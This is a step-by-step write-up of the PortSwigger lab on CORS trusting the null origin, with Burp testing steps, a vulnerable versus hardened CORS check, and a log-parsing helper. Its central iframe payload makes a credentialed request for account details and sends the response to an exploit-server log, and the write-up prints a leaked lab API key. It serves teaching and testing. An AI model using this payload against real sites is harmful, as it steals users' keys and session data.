Introduction
Hello friends, this is our second article on CORS vulnerabilities. In this article we solve the PortSwigger Web Security Academy lab “CORS vulnerability with trusted null origin” step by step, hands-on.
Lab Description
This lab has an insecure CORS configuration that trusts the null origin. To solve it, you need to craft JavaScript that uses CORS to retrieve the administrator’s API key, host it on your exploit server, and submit the key. You can log in with the credentials “wiener:peter”.
Lab Solution
Firstly, access the lab and log in with the provided credentials.
Once you have logged in, make sure Burp’s proxy is running and your browser is routed through it. Now click on “My Account” and refresh the page.
In Burp’s HTTP history you will see a request to “/accountDetails”, which returns the logged-in user’s details as JSON. Send this request to the Repeater tab, as it is the one we need to test.
Simply add the header “Origin: null” to this request and send it. You will see “access-control-allow-origin: null” in the response, indicating that the server trusts the null origin. Also check that the response carries “access-control-allow-credentials: true”: without it, the browser will not expose a cookie-bearing cross-origin response to the script and the attack fails.
A sandboxed iframe sends exactly this “Origin: null”, so we can now exploit this vulnerability.
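To make the check above concrete, here is an added example (it is not code from the original write-up or from PortSwigger) that shows the server-side mistake that causes “null” to be trusted, a hardened version of the same check, and a small classifier for the Repeater response. The allowlist contents, the “https://example.com” and “https://attacker.example” origins and all function names are my own assumptions; it runs offline under Node.js.

```javascript
// Added example, not code from the original write-up or from PortSwigger.
// Server side: the mistake that makes "Origin: null" trusted, beside a hardened
// version. Client side: the check a tester applies to the Repeater response.
// The allowlist contents and sample origins below are assumptions.

// Vulnerable: the allowlist carries the literal string "null". Browsers send
// Origin: null from sandboxed iframes, file:// pages and some cross-origin
// redirects, so any attacker page can satisfy this check.
function corsHeadersVulnerable(origin, allowlist = ['https://example.com', 'null']) {
  if (typeof origin === 'string' && allowlist.includes(origin)) {
    return {
      'Access-Control-Allow-Origin': origin,
      'Access-Control-Allow-Credentials': 'true',
    };
  }
  return {};
}

// Hardened: reject "null" outright and exact-match concrete HTTPS origins only.
// Vary: Origin stops a shared cache from serving one origin's ACAO to another.
function corsHeadersHardened(origin, allowlist = ['https://example.com']) {
  if (typeof origin !== 'string' || origin === 'null') return {};
  if (!allowlist.includes(origin)) return {};
  return {
    'Access-Control-Allow-Origin': origin,
    'Access-Control-Allow-Credentials': 'true',
    'Vary': 'Origin',
  };
}

// Tester side: classify the response to a request that carried `sentOrigin`.
// Header names are matched case-insensitively, as Burp shows them lowercased.
function classifyCors(responseHeaders, sentOrigin) {
  const h = {};
  for (const [name, value] of Object.entries(responseHeaders)) {
    h[name.toLowerCase()] = String(value).trim();
  }
  const acao = h['access-control-allow-origin'];
  const credentialed = h['access-control-allow-credentials'] === 'true';
  if (acao === undefined) return 'no-cors';          // nothing to exploit
  if (acao === '*') return 'wildcard';               // browsers refuse * with credentials
  if (acao !== sentOrigin) return 'fixed-origin';    // some other site is trusted
  if (sentOrigin === 'null') {
    return credentialed ? 'null-origin-credentialed' // this lab's bug
                        : 'null-origin-anonymous';
  }
  return credentialed ? 'origin-echoed-credentialed' // allowlisted or reflected: probe again
                      : 'origin-echoed-anonymous';
}
```

The “origin-echoed” results deserve a second probe with an arbitrary origin such as “https://attacker.example”: if that one is echoed too, the server reflects any origin rather than checking an allowlist, which is the first lab in this series.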
First, write a script that retrieves the administrator’s account details, including the API key, from the victim’s browser. A sandboxed iframe loaded via “srcdoc” runs with the null origin, which the server trusts, and “withCredentials” makes the browser attach the victim’s session cookie to the request. Here is the script:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
// Runs with Origin: null because of the sandbox attribute
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://YOUR-LAB-ID.web-security-academy.net/accountDetails',true);
// Send the victim's session cookie with the cross-origin request
req.withCredentials = true;
req.send();
function reqListener() {
// Exfiltrate the JSON response to the exploit server's access log
location='https://YOUR-EXPLOIT-SERVER-ID.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
In the script, replace “YOUR-LAB-ID” with your lab’s ID and “YOUR-EXPLOIT-SERVER-ID” with your exploit server’s ID; both can be read from the respective URLs. Read the script carefully, as it points at both the lab and the exploit server.
For example, if your lab URL is “https://0adb006a04c1fe5483505125003800fc.web-security-academy.net” and your exploit server URL is “https://exploit-0a5e0010045ffe40837350790120009c.exploit-server.net”, the modified script looks like this:
<iframe sandbox="allow-scripts allow-top-navigation allow-forms" srcdoc="<script>
var req = new XMLHttpRequest();
req.onload = reqListener;
req.open('get','https://0adb006a04c1fe5483505125003800fc.web-security-academy.net/accountDetails',true);
req.withCredentials = true;
req.send();
function reqListener() {
location='https://exploit-0a5e0010045ffe40837350790120009c.exploit-server.net/log?key='+encodeURIComponent(this.responseText);
};
</script>"></iframe>
Once you have stored this code in the body of your exploit server, click on “Deliver exploit to victim”. The victim (who is logged in as the administrator) opens the page, the sandboxed iframe fires the credentialed request, and the response is sent to your “/log” endpoint. Now click on “Access log” to check the logs.
In the access log, you will find an entry like the following:
"GET /log?key=%7B%0A%20%20%22username%22%3A%20%22administrator%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22Ck7TNksY2x0PXkGBBEeh5hksHBCa5H8b%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22GbgfPPpHAiXlz0AmPQ9GcAPxQBSXggXJ%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
From the server log you can see that we have obtained the administrator’s account details. The value is the URL-encoded JSON response; after decoding it, the “apikey” field holds the key:
Ck7TNksY2x0PXkGBBEeh5hksHBCa5H8b
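Decoding the percent-encoded blob by eye is error-prone, so here is an added example (not part of the original write-up) of a small Node.js helper that pulls the key out of exploit server access log lines. The sample line is the one printed above; the function and variable names, and the second constructed log line used to show a non-matching entry, are my own.

```javascript
// Added example, not code from the original write-up or from PortSwigger.
// Extracts the leaked API key from exploit server access log lines.
// SAMPLE_LOG_LINE is the entry shown in the write-up; the names are assumptions.

const SAMPLE_LOG_LINE =
  '"GET /log?key=%7B%0A%20%20%22username%22%3A%20%22administrator%22%2C%0A%20%20%22email%22%3A%20%22%22%2C%0A%20%20%22apikey%22%3A%20%22Ck7TNksY2x0PXkGBBEeh5hksHBCa5H8b%22%2C%0A%20%20%22sessions%22%3A%20%5B%0A%20%20%20%20%22GbgfPPpHAiXlz0AmPQ9GcAPxQBSXggXJ%22%0A%20%20%5D%0A%7D HTTP/1.1" 200 "user-agent: Mozilla/5.0 (Victim) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"';

// Constructed line for an unrelated request (for example, our own visit).
const UNRELATED_LOG_LINE = '"GET / HTTP/1.1" 200 "user-agent: Mozilla/5.0 (tester)"';

// Returns the JSON object the victim's browser leaked via /log?key=, or null
// when the line is not such a hit or the payload does not decode to JSON.
function parseLeakedAccountDetails(logLine) {
  const m = /"(?:GET|POST) \/log\?key=([^ "]+) HTTP\/[\d.]+"/.exec(logLine);
  if (!m) return null;
  let decoded;
  try {
    decoded = decodeURIComponent(m[1]);   // undo encodeURIComponent() from the exploit
  } catch (e) {
    return null;                          // malformed percent-encoding
  }
  try {
    return JSON.parse(decoded);
  } catch (e) {
    return null;                          // not the JSON /accountDetails body
  }
}

// The single value the lab asks for.
function extractApiKey(logLine) {
  const details = parseLeakedAccountDetails(logLine);
  return details && typeof details.apikey === 'string' ? details.apikey : null;
}

// Scan a whole access log (one entry per line) and keep only victim hits.
function extractApiKeys(logText) {
  return logText.split('\n').map(extractApiKey).filter((k) => k !== null);
}
```

Filtering the whole log matters in practice: your own test visits and the exploit server’s own requests land in the same log, and only the entries that carry a decodable JSON body with an “apikey” field are the victim’s.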
You can now submit this key via “Submit solution” to complete the PortSwigger Web Security Academy lab “CORS vulnerability with trusted null origin”.
Feel free to explore our website to learn more about web security. We regularly publish the latest articles on various web security topics. Stay connected with us!
FAQs
Website security refers to protecting a website or web application from cyberattacks, unauthorized access and other security threats.
Web application security means protecting a web application from attacks that exploit vulnerabilities such as SQL injection, XSS, file inclusion and others.
It is good practice to use an up-to-date browser and keep its plugins patched, avoid suspicious websites and links, enable two-factor authentication, and be wary of clickjacking.
Searching for someone’s Social Security number or credit card information on the dark web is illegal and unethical. Always avoid such activities and protect yourself and others from cyber threats.